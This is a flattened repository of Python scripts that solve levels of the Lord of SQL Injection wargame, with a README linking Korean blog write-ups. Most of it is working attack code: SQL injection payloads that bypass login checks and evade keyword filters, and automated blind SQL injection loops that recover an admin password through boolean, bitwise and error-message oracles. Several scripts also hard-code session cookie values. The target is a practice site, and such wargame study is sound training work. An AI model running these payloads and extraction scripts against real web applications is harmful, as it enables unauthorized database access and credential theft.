├── 10_Skeleton.py ├── 11_Golem.py ├── 12_Darknight.py ├── 13_Bugbear.py ├── 14_Giant.py ├── 15_Assassin.py ├── 16_Zombie_Assassin.py ├── 17_Succubus.py ├── 18_Nightmare.py ├── 19_Xavis.py ├── 1_Gremline.py ├── 21_Iron_golem.py ├── 22_Dark_eyes.py ├── 2_Cobolt.py ├── 3_Goblin.py ├── 4_Orc.py ├── 5_Wolfman.py ├── 6_DarkElf.py ├── 7_Orge.py ├── 8_Troll.py ├── 9_Vampire.py └── README.md
# NOTE(review): this page is a flattened dump of a repository of Lord of SQL Injection
# wargame solutions, one script per level; the separator lines below mark where each
# script begins. Several string literals (the "... Clear!" and "Hello admin" checks) span
# lines in this copy — the markup that surrounded the text appears to have been lost in
# extraction, so confirm those literals against the original files before relying on them.
# NOTE(review): several distinct live PHPSESSID values are hard-coded across these scripts.
# A session id is a bearer credential; read it from input or the environment (as the
# raw_input()/input() scripts do) rather than committing it. The scripts also mix Python 2
# (`print` statements, raw_input()) and Python 3 idioms; under Python 2, input() evaluates
# whatever is typed, so raw_input() is the safe choice there.
# NOTE(review): the success checks use `find(...) > 0`, which would miss a match at offset 0,
# and every length-guessing loop binds `length`/`idLength` only on a hit — if nothing matches,
# the following loop raises NameError instead of reporting the failure.
--------------------------------------------------------------------------------
/10_Skeleton.py:
--------------------------------------------------------------------------------
# - *- coding : UTF-8 -*-
from requests import get

# Set the URL. The query string is appended already percent-encoded.
url = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php"
param = "?pw=%27||id=%27admin%27%23"
new_url = url + param

# Set the cookie; it must be your own.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")


# Send the HTTP request.
r = get(new_url, cookies=cookies)

# Success is detected by searching the response body for the level's clear banner.
if r.text.find("

SKELETON Clear!

") > 0:
    print("축하합니다! Skeleton을 클리어했습니다!")

--------------------------------------------------------------------------------
/11_Golem.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# coding: utf-8

import requests
import sys # module for exit()
from sys import stdout # module for fflush()


print("#### Lord of SQL Injection - Golem ####\n")

# Set the URL.
url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php"

# The session id is read from the user (Python 2 raw_input: taken literally, not evaluated).
session = raw_input("Input your LOS session : ")
# session = "lqaa55h0s48l8h06rc9sguktt0"

# Set header to set cookie
headers = {
    'Cookie': 'PHPSESSID={0}'.format(session)
}


""" The valuble for storing admin password """
password = ""

# Counts requests; note the length loop below does not increment it.
query = 0



"""
No Hack Words :
- prob
- _
- .
- ()
- or
- and
- substr(
- =

"""


# Rewrites a payload so it avoids the filtered words listed above.
# Each substitution is applied to the whole string, so any other occurrence of
# "or"/"and"/"=" in the argument is rewritten too. Exits the process if "prob" remains.
def replace(param):
    param = str(param)

    param = param.replace("or", "||")
    param = param.replace("and", "%26%26")
    param = param.replace("=", " like ")
    param = param.replace("substr(", "mid(")
    param = param.replace("#", "%23")

    if "prob" in param:
        print "Your param has 'prob'!"
        sys.exit()

    return param



# get the length of password
# `length` is only bound when a response matches; see the note at the top of this page.
for i in range(100):
    param = replace("' or length(pw)={0}#".format(i))
    content = requests.get(url + "?pw=" + param, headers=headers).text

    if content.find("

Hello admin

") > -1:
        length = i
        print "[*] The length of pw : {0}".format(i)

        break



print("\n\n#### Starting Blind SQL Injection ####\n")
# One character per outer iteration, recovered bit by bit from the 7-bit binary string
# and rebuilt with chr(int(binary, 2)).
for i in range(1, length + 1):
    binary = ''
    for j in range(0, 8):
        param = "?pw=' || id like 'admin' %26%26 (select mid(lpad(bin(ascii(mid(pw,{0},1))),7,0),{1},1) like 1)%23".format(i, j)
        content = requests.get(url + param, headers=headers).text
        query += 1

        if content.find("Hello admin") > 0:
            binary += '1'
        else:
            binary += '0'

    password += chr(int(binary, 2))

    print chr(int(binary, 2)), "({0})".format(binary)
    stdout.flush()

print "\n[*] the password : ", password



# Final check: log in with the recovered value and look for the clear banner.
url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw={0}".format(password)
r = requests.get(url, headers=headers)

if r.text.find("

GOLEM Clear!

") > 0:
    print "[*] message : Golem Clear!"

print "[*] total queries : {0}".format(query)

--------------------------------------------------------------------------------
/12_Darknight.py:
--------------------------------------------------------------------------------
# -*- coding : UTF-8 -*-
from requests import get
import string

print("#### Lord of SQL Injection - Darknight ####\n")

# Set the URL.
url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"

# Set the cookie; it must be your own cookie.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
abc = string.digits + string.ascii_letters # Character set used for the brute force.
result = ""

# Guess the length of pw.
# Despite its name, idLength holds the pw length plus one (the exclusive bound of the loop below).
for i in range(1,20):
    param = "?no=1 || ord(id) like 97 %26%26length(pw) like " + str(i)
    new_url = url + param
    r = get(new_url, cookies=cookies)

    if r.text.find("

Hello admin

") > 0:
        idLength = i + 1
        print("pw의 길이는 " + str(i) + " 입니다.")
        break


# Run the blind SQL injection using the information obtained above.
# The probe is negated (<>), so a character is accepted when the "Hello admin" text is absent.
print("\n\n#### Starting Blind SQL Injection ####\n")
for i in range(1, idLength):
    for a in abc:
        param = "?no=1 or ord(id) like 97 %26%26 ord(mid(pw," + str(i) + ",1)) <> " + str(ord(a))
        new_url = url + param
        r = get(new_url, cookies=cookies)

        if r.text.find("

Hello admin

") == -1:
            print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
            result += a
            break

    # Only the first position is checked for a miss; later positions silently yield nothing.
    if i == 1 and result == "":
        print("FAIL")
        exit(-1)

    # After the last position, verify the recovered value against the page.
    if i == idLength-1:
        print("\n\n#### RESULT ####")
        print("pw : " + result)

        url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=" + result
        r = get(url, cookies=cookies)

        if r.text.find("

DARKKNIGHT Clear!

") > 0:
            print("축하합니다! Darknight를 클리어했습니다.")

--------------------------------------------------------------------------------
/13_Bugbear.py:
--------------------------------------------------------------------------------
# -*- coding : UTF-8 -*-
from requests import get
import string

print("#### Lord of SQL Injection - Bugbear ####\n")

# Set the URL.
url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php"

# Set the cookie; it must be your own cookie.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
abc = string.digits + string.ascii_letters # Character set used for the brute force.
result = ""

# Guess the length of pw.
# Same structure as 12_Darknight.py: idLength is the pw length plus one, and the
# probe is negated, so a hit is the absence of "Hello admin".
for i in range(1,20):
    param = "?no=1||hex(mid(id,1,1))in(61)%26%26length(pw)<>" + str(i)
    new_url = url + param
    r = get(new_url, cookies=cookies)

    if r.text.find("

Hello admin

") == -1:
        idLength = i + 1
        print("pw의 길이는 " + str(i) + " 입니다.")
        break


# Run the blind SQL injection using the information obtained above.
print("\n\n#### Starting Blind SQL Injection ####\n")
for i in range(1, idLength):
    for a in abc:
        # Candidate character as a bare hex string (no 0x prefix).
        ab = str(hex(ord(a))).replace("0x", "")
        param = "?no=1||hex(mid(id,1,1))in(61)%26%26hex(mid(pw," + str(i) + ",1))<>" + ab
        new_url = url + param
        r = get(new_url, cookies=cookies)

        if r.text.find("

Hello admin

") == -1:
            print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
            result += a
            break

    if i == 1 and result == "":
        print("FAIL")
        exit(-1)

    if i == idLength-1:
        print("\n\n#### RESULT ####")
        print("pw : " + result)

        url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=" + result
        r = get(url, cookies=cookies)

        if r.text.find("

BUGBEAR Clear!

") > 0:
            print("축하합니다! Bugbear를 클리어했습니다.")

--------------------------------------------------------------------------------
/14_Giant.py:
--------------------------------------------------------------------------------
# - *- coding : UTF-8 -*-
from requests import get
import random

# Set the URL.
url = "http://los.eagle-jump.org/giant_9e5c61fc7f0711c680a4bf2553ee60bb.php"

# Store the line-break characters that are accepted (vertical tab and form feed, percent-encoded).
new_tab = ["%0b", "%0c"]

# Pick one of the two characters above at random; either is expected to work.
rand_int = random.randint(0,1)
param = "?shit=" + new_tab[rand_int]
new_url = url + param

# Set the cookie; it must be your own.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")


# Send the HTTP request.
r = get(new_url, cookies=cookies)

if r.text.find("

GIANT Clear!

") > 0:
    print("축하합니다! Giant을 클리어했습니다!")

--------------------------------------------------------------------------------
/15_Assassin.py:
--------------------------------------------------------------------------------
# -*- coding : UTF-8 -*-
from requests import get
import string

print("#### Lord of SQL Injection - Assassin ####\n")

# Set the URL.
url = "http://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php"

# Set the cookie; it must be your own cookie.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")

# Character set used for the brute force.
abc = string.digits + string.ascii_letters

result = ""

# Run the blind SQL injection using the information obtained above.
# This level uses a prefix probe (recovered prefix + candidate + "%"), so no length
# step is needed. There is no break after a hit: every character of abc is tried for
# each position, and the loop ends when a position yields nothing new.
print("\n\n#### Starting Blind SQL Injection ####\n")
identify = 0 # set on the first hit but never read afterwards
for i in range(1,20):
    for a in abc:
        param = "?pw=" + result + a + "%"
        new_url = url + param
        r = get(new_url, cookies=cookies)

        if r.text.find("

Hello guest

") > 0:
            identify = 1
            print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
            result += a
            # The clear banner is checked on the same response; the message text
            # names "Orge" (left as written — it is runtime output).
            if r.text.find("

ASSASSIN Clear!

") > 0:
                print("축하합니다! Orge를 클리어했습니다.")


    if len(result) < (i-1):
        break

print("\n\n#### RESULT ####")
print("pw : " + result)
--------------------------------------------------------------------------------
/16_Zombie_Assassin.py:
--------------------------------------------------------------------------------
# - *- coding : UTF-8 -*-
from requests import get

# Set the URL.
url = "http://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php"
param = "?pw=%00%27or%271%27=%271"
new_url = url + param

# Set the cookie; it must be your own.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")


# Send the HTTP request.
r = get(new_url, cookies=cookies)

if r.text.find("

ZOMBIE_ASSASSIN Clear!

") > 0:
    print("축하합니다! Zombie assassin을 클리어했습니다!")

--------------------------------------------------------------------------------
/17_Succubus.py:
--------------------------------------------------------------------------------
# - *- coding : UTF-8 -*-
from requests import get

# Set the URL.
# NOTE(review): "\&" is not a recognised Python escape, so the backslash is kept literally
# (Python 3.6+ warns about it); confirm that the backslash is intended.
url = "http://los.eagle-jump.org/succubus_8ab2d195be2e0b10a3b5aa2873d0863f.php"
param = "?id=asdf\&pw=or%201=1%23"
new_url = url + param

# Set the cookie; it must be your own.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")


# Send the HTTP request.
r = get(new_url, cookies=cookies)

if r.text.find("

SUCCUBUS Clear!

") > 0:
    print("축하합니다! Succubus를 클리어했습니다!")

--------------------------------------------------------------------------------
/18_Nightmare.py:
--------------------------------------------------------------------------------
# - *- coding : UTF-8 -*-
from requests import get

# Set the URL.
url = "http://los.eagle-jump.org/nightmare_ce407ee88ba848c2bec8e42aaeaa6ad4.php"
param = "?pw=%27)<1;%00"
new_url = url + param

# Set the cookie; it must be your own.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")


# Send the HTTP request.
r = get(new_url, cookies=cookies)

if r.text.find("

NIGHTMARE Clear!

") > 0:
    print("축하합니다! Nightmare를 클리어했습니다!")

--------------------------------------------------------------------------------
/19_Xavis.py:
--------------------------------------------------------------------------------
# -*- coding : UTF-8 -*-
# Every character of pw has a code point above 160, so the search starts at 160 for efficiency.
import requests

# Set cookies
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID='gsen5qt14q70cvj5doeee5lvp1')

result = ""
hexacode = '0x' # hex form of the recovered value, built alongside result
# Positions 1..10 are probed; the candidate range 160..999 covers code points, not just ASCII.
for i in range(1,11):
    print("-" * 25)
    print("[=] Testing %d character" % i)
    print('-' * 25)
    # `ascii` shadows the builtin of the same name.
    for ascii in range(160, 1000):
        # The +40 only shifts the value tested in this iteration; it does not change the
        # iteration itself, so values in between are skipped for positions 2 and 6.
        if i == 2 or i == 6:
            ascii += 40
        url = 'http://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php'
        url += "?pw=1'||ord(id)=97%26%26ord(mid(pw,{0},1))={1}%23".format(i, ascii)
        #print "[=] Testing url : " + url

        r = requests.get(url, cookies=cookies)

        if r.text.find("Hello admin") > -1:
            # chr() of a value above 255 requires Python 3 (Python 2's chr is 8-bit) — presumably run under Python 3.
            char = chr(ascii)
            hexacode += str(hex(ascii)).replace('0x', '')
            print("\n[*] %d character is %s (ascii code : %d)\n\n" % (i, char, ascii))
            result += char
            break

print("\n\n\n[*] admin's password : %s(hexacode : %s)" % (result, hexacode))


--------------------------------------------------------------------------------
/1_Gremline.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# coding: utf-8

from requests import get


url = "http://los.eagle-jump.org/gremlin_bbc5af7bed14aa50b84986f2de742f31.php"

# Set PHPSESSID by user input
# NOTE(review): under the Python 2 interpreter named in the shebang, input() evaluates the
# typed text; raw_input() reads it literally (as 4_Orc.py, 6_DarkElf.py and 7_Orge.py do).
session = input("Input your LOS session : ")
# session = "gequo9hff2f19sjmieftjnuf50"

# Browser-like headers; the session id goes into the Cookie header.
# NOTE(review): advertising "br" means the body may come back brotli-compressed; requests
# can only decode that when the brotli package is installed, otherwise the banner search
# below would silently fail.
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
    'Cookie': 'PHPSESSID={0}'.format(session)
}

param = "?id='or'1'='1'%23"

r = get(url + param , headers=headers)

if r.text.find("

GREMLIN Clear!

") > 0:
    print("Gremlin Clear!")
--------------------------------------------------------------------------------
/21_Iron_golem.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# coding: utf-8
import requests

# Set cookies
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="gequo9hff2f19sjmieftjnuf50")



# pw Length guessing
# The oracle here is an error message ("Subquery returns more than 1 row") rather than a banner.
print("Starting pw guessing")
for i in range(1, 100):
    url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
    payload = "?pw=1'||if(length(pw)="+str(i)+",1,(select%201%20union%20select%202))%23"
    url += payload

    r = requests.get(url, cookies=cookies)
    if r.text.find("Subquery returns more than 1 row") > -1:
        print("[*] pw의 길이는 %2d가 아닙니다. " % i)
    else :
        print("[*] pw의 길이는 %2d입니다!" % i)
        length = i
        break


# start pwning
# This pass only prints whether each position is above the threshold; its outcome is not
# stored. `pwn` is assigned inside the loop and reused as the lower bound of the final loop.
print("\n\n\n")
print("[+] Configuring pw")
for i in range(1, length+1):
    pwn = 31
    url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
    payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))>"+str(pwn)+",1,(select%201%20union%20select%202))%23"
    url += payload

    r = requests.get(url, cookies=cookies)
    if r.text.find("Subquery returns more than 1 row") > -1:
        print("[*] pw의 %2d번째에 값이 없습니다." % (i))
    else :
        print("[*] pw의 %2d번째에 값이 있습니다!" % (i))


print("\n\n\n")
result = ""
print("[+] Starting to pwn")
# NOTE(review): walks a fixed 4 positions (range(1,5)) rather than the `length` found above.
for i in range(1,5):
    for j in range(pwn, 100):
        url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
        payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))="+str(j)+",1,(select%201%20union%20select%202))%23"
        url += payload

        r = requests.get(url, cookies=cookies)
        if r.text.find("Subquery returns more than 1 row") > -1:
            print("[*] pw의 %d번째 값은 %d가 아닙니다. 
" % (i, j))
        else :
            print("[*] pw의 %d번째 값은 %d입니다! " % (i, j))
            result += chr(j)
            break

print("\n\n\n[+] result : " + result + "\n")
--------------------------------------------------------------------------------
/22_Dark_eyes.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# -*- coding : UTF-8 -*-

import requests
import string

# url encoding
# Percent-encodes the handful of characters the payloads below use. It is not a general
# URL encoder: a single "&" is turned into "%26%26" (two ampersands), and "%" itself is
# left untouched, so an input that already contains percent-escapes is not double-encoded.
def urlQuery(url):
    url = url.replace("#", "%23")
    url = url.replace(" ", "%20")
    url = url.replace("'", "%27")
    url = url.replace("&", "%26%26")
    url = url.replace(">", "%3E")
    url = url.replace("<", "%3C")

    return url

# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="8nprcactb6uekd9ocb96q3fh17")
url = "http://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"


# Candidate characters; they are sent as ord() values below, so the punctuation here never
# reaches the URL unencoded.
abc = string.ascii_letters + string.digits + "!@#$%^&*()_-{}[];:><,./?"

# select * from test where id='admin' and pw='' or ord(id)=97 and (length(pw)=0 or (select 1 union select pw))



# pw length config
# The oracle is the response size: an error page is assumed to be shorter than 5 characters.
print("[+] pw length config \n")
for i in range(0, 100):
    payload = "?pw=' OR ord(id)=97 and (length(pw)=" + str(i) + " or (select 1 union select pw))#"
    payload = urlQuery(payload)
    r = requests.get(url+payload, cookies=cookies)

    if len(r.text) < 5:
        print("[-] Err0r was f0und. - the length of the 'pw' is not " + str(i))
    else :
        print("[*] the length of 'pw' is " + str(i))
        length = i
        break

result = ""
print("\n\n=====================\n\nblind sqli start\n")
# This payload is not passed through urlQuery(); only "#" is pre-encoded (as %23) and the
# rest is left for the HTTP library to escape.
for i in range(1, (length+1)):
    for a in abc:
        payload = "?pw=' OR ord(id)=97 AND (ord(mid(pw,"+str(i)+",1))="+str(ord(a))+\
        " or (select 1 union select pw))%23"

        r = requests.get(url+payload, cookies=cookies)

        if len(r.text) < 5:
            print("[-] Err0r was f0und. 
(%d, %c)" %(i, a))
        else:
            print("[*] the %d pw is %c" % (i, a))
            result += a
            break

print("[=] the result : " + result)
--------------------------------------------------------------------------------
/2_Cobolt.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# coding: utf-8
import requests

url = "http://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php"
param = "?id=admin'%23"

# NOTE(review): under Python 2, input() evaluates the typed text — raw_input() reads it literally.
cookie = input("Input your session : ")
# cookie = "5u71g5vp7547tv8ffl7osl0fl5"

# The typed value is sent as the whole Cookie header; unlike the other scripts no
# "PHPSESSID=" name is prepended, so the user presumably has to type it — confirm.
headers = {
    'Cookie': cookie
}

r = requests.get(url + param, headers=headers)

if r.text.find("

COBOLT Clear!

") > 0:
    print("Cobolt Clear!")
--------------------------------------------------------------------------------
/3_Goblin.py:
--------------------------------------------------------------------------------
# -*- coding : UTF-8 -*-
from requests import get

url = "http://los.eagle-jump.org/goblin_5559aacf2617d21ebb6efe907b7dded8.php"
# Solve it using MySQL's substr() function.
param = "?no=0%20or%20ascii(substr(id,1,1))=97"

new_url = url + param

# Set the cookie; it must be your own cookie.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookie = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")


r = get(new_url, cookies=cookie)
if r.text.find("

GOBLIN Clear!

") > 0:
    print("축하합니다! Goblin을 클리어했습니다!")
--------------------------------------------------------------------------------
/4_Orc.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
from sys import stdout

query = 0 # request counter, reported at the end
print("#### Lord of SQL Injection - Orc ####\n")

url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"


# session = "gequo9hff2f19sjmieftjnuf50"
# Python 2 raw_input: the session id is taken literally, not evaluated.
session = raw_input("Input your LOS session : ")

headers = {
    'Cookie': 'PHPSESSID={0}'.format(session)
}

password = ""

# get the length of password
for i in range(100):
    param = "?pw=' or id='admin' and length(pw)={0}%23".format(i)

    content = requests.get(url + param, headers=headers).text
    query += 1

    if content.find("Hello admin") > -1:
        length = i
        print "[*] The length of admin password : {0}".format(i)
        break


print("\n\n#### Starting Blind SQL Injection ####\n")
# substr(lpad(bin(ascii(substr('asdf',1,1))),7,0),1,1)

print "[*] the password : ",
stdout.flush()

# One character per outer iteration, rebuilt from the 7-bit binary string.
for i in range(1, length+1):

    binary = ''
    for j in range(0, 8):
        param = "?pw=' or id='admin' and (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j)
        content = requests.get(url + param, headers=headers).text
        query += 1

        if content.find("Hello admin") > 0:
            binary += '1'
        else:
            binary += '0'

    password += chr(int(binary, 2))

    print chr(int(binary, 2)),
    stdout.flush()

print "\n[*] the password : ", password


# NOTE(review): the final check appends the last probe `param` (a second "?pw=...") to a URL
# that already carries ?pw=, and searches `.content` (bytes) rather than `.text` — the
# verification request is therefore not the one 7_Orge.py / 11_Golem.py send. Confirm.
url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw={0}".format(password)
content = requests.get(url + param, headers=headers).content

if content.find("

ORC Clear!

") > 0:
    print "ORC Clear!"

print "[+] total query : {0}".format(query)
--------------------------------------------------------------------------------
/5_Wolfman.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# coding: utf-8

import requests
import urllib # imported but not used


# NOTE(review): str.replace() returns a new string and its result is discarded on every
# iteration, so this function returns its argument unchanged; the already-encoded payload
# below reaches the server as written.
def urlencode(query):
    replacement = {
        '#': '%23',
        '&': '%26',
        ' ': '%20',
        '=': '%3D',
        '+': '%2B',
        '\'': '%27',
        '%': '%25'
    }

    for r in replacement:
        query.replace(r, replacement[r])

    return query

# Set the URL.
url = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php"
param = urlencode("?pw='||id='admin'%23")


# NOTE(review): this file is Python 2 (print statement below), where input() evaluates the
# typed text; raw_input() reads it literally.
session = input("Input your LOS session : ")
headers = {
    'Cookie': 'PHPSESSID={0}'.format(session)
}


r = requests.get(url + param, headers=headers)

if r.text.find("

WOLFMAN Clear!

") > 0:
    print "Wolfman Clear!"

--------------------------------------------------------------------------------
/6_DarkElf.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# coding: utf-8

import requests

url = "http://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php"
param = "?pw=%27||id=%27admin"

# Python 2 raw_input: the session id is taken literally, not evaluated.
session = raw_input("Input your LOS session : ")
# session = "gequo9hff2f19sjmieftjnuf50"

headers = {
    'Cookie': 'PHPSESSID={0}'.format(session)
}


r = requests.get(url + param, headers=headers)

if r.text.find("

DARKELF Clear!

") > 0:
    print("DarkElf Clear!")

--------------------------------------------------------------------------------
/7_Orge.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# coding: utf-8

import requests
from sys import stdout

print("#### Lord of SQL Injection - Orge ####\n")

url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"

# Python 2 raw_input: the session id is taken literally, not evaluated.
session = raw_input("Input your LOS session : ")
# session = "lqaa55h0s48l8h06rc9sguktt0"

headers = {
    'Cookie': 'PHPSESSID={0}'.format(session)
}

password = ""
query = 0 # request counter, reported at the end


# guess the length of password
for i in range(100):
    param = "?pw=' || id='admin' %26%26 length(pw)={0}%23".format(i)
    r = requests.get(url + param, headers=headers)
    query += 1

    if r.text.find("

Hello admin

") > 0:
        length = i
        print "[*] The length of 'pw' is {0}".format(i)
        break




print("\n\n#### Starting Blind SQL Injection ####\n")
# One character per outer iteration, rebuilt from the 7-bit binary string
# (same scheme as 4_Orc.py and 11_Golem.py).
for i in range(1, length + 1):
    binary = ''
    for j in range(0, 8):
        param = "?pw=' || id='admin' %26%26 (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j)
        content = requests.get(url + param, headers=headers).text
        query += 1

        if content.find("Hello admin") > 0:
            binary += '1'
        else:
            binary += '0'

    password += chr(int(binary, 2))

    print chr(int(binary, 2)), "({0})".format(binary)
    stdout.flush()

print "\n[*] the password : ", password


# Final check: log in with the recovered value and look for the clear banner.
url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=" + password
r = requests.get(url, headers=headers)

if r.text.find("

ORGE Clear!

") > 0:
    print "[*] message : Orge Clear!"

print "[*] total queries : {0}".format(query)
--------------------------------------------------------------------------------
/8_Troll.py:
--------------------------------------------------------------------------------
# - *- coding : UTF-8 -*-
from requests import get

# Set the URL.
url = "http://los.eagle-jump.org/troll_6d1f080fa30a07dbaf7342285ba0e158.php"
param = "?id=admIn"
new_url = url + param

# Set the cookie; it must be your own.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")


# Send the HTTP request.
r = get(new_url, cookies=cookies)

if r.text.find("

TROLL Clear!

") > 0:
    print("축하합니다! Troll을 클리어했습니다!")

--------------------------------------------------------------------------------
/9_Vampire.py:
--------------------------------------------------------------------------------
# - *- coding : UTF-8 -*-
from requests import get

# Set the URL.
url = "http://los.eagle-jump.org/vampire_0538b0259b6680c1ca4631a388177ed4.php"
param = "?id=admadminin"
new_url = url + param

# Set the cookie; it must be your own.
# NOTE(review): hard-coded session cookie (bearer credential) — read it from input/env instead of committing it.
cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")


# Send the HTTP request.
r = get(new_url, cookies=cookies)

if r.text.find("

VAMPIRE Clear!

") > 0:
    print("축하합니다! Vampire을 클리어했습니다!")

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Lord-of-SQL-Injection
Lord of SQL Injection (주석은 한글로 작성되어 있습니다. / Comments were written in Korean!)

1. Gremlin : http://chaneyoon.tistory.com/51
2. Cobolt : http://chaneyoon.tistory.com/52
3. Goblin : http://chaneyoon.tistory.com/53
4. Orc : http://chaneyoon.tistory.com/54
5. Wolfman : http://chaneyoon.tistory.com/55
6. Darkelf : http://chaneyoon.tistory.com/56
7. Orge : http://chaneyoon.tistory.com/57
8. Troll : http://chaneyoon.tistory.com/58
9. Vampire : http://chaneyoon.tistory.com/59
10. Skeleton : http://chaneyoon.tistory.com/60
11. Golem : http://chaneyoon.tistory.com/61
12. Darknight : http://chaneyoon.tistory.com/62
13. Bugbear : http://chaneyoon.tistory.com/63
14. Giant : http://chaneyoon.tistory.com/64
15. Assassin : http://chaneyoon.tistory.com/65
16. Assassin_Zombie : http://chaneyoon.tistory.com/66
21. Iron_golem : http://chaneyoon.tistory.com/107


--------------------------------------------------------------------------------